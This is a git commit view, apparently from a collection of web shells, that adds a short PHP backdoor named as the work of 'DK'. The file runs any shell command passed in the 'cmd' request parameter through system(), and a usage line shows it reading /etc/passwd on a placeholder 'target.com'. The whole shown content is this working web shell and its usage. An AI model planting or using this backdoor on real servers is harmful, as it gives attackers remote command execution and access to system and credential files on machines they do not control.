Add "Web-Shells"

This commit is contained in:
g0tmi1k
2017-12-20 16:32:34 +00:00
parent 85ac8e9be7
commit b794d53a28
38 changed files with 0 additions and 0 deletions

View File

@@ -0,0 +1,17 @@
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
<!-- http://michaeldaw.org 2006 -->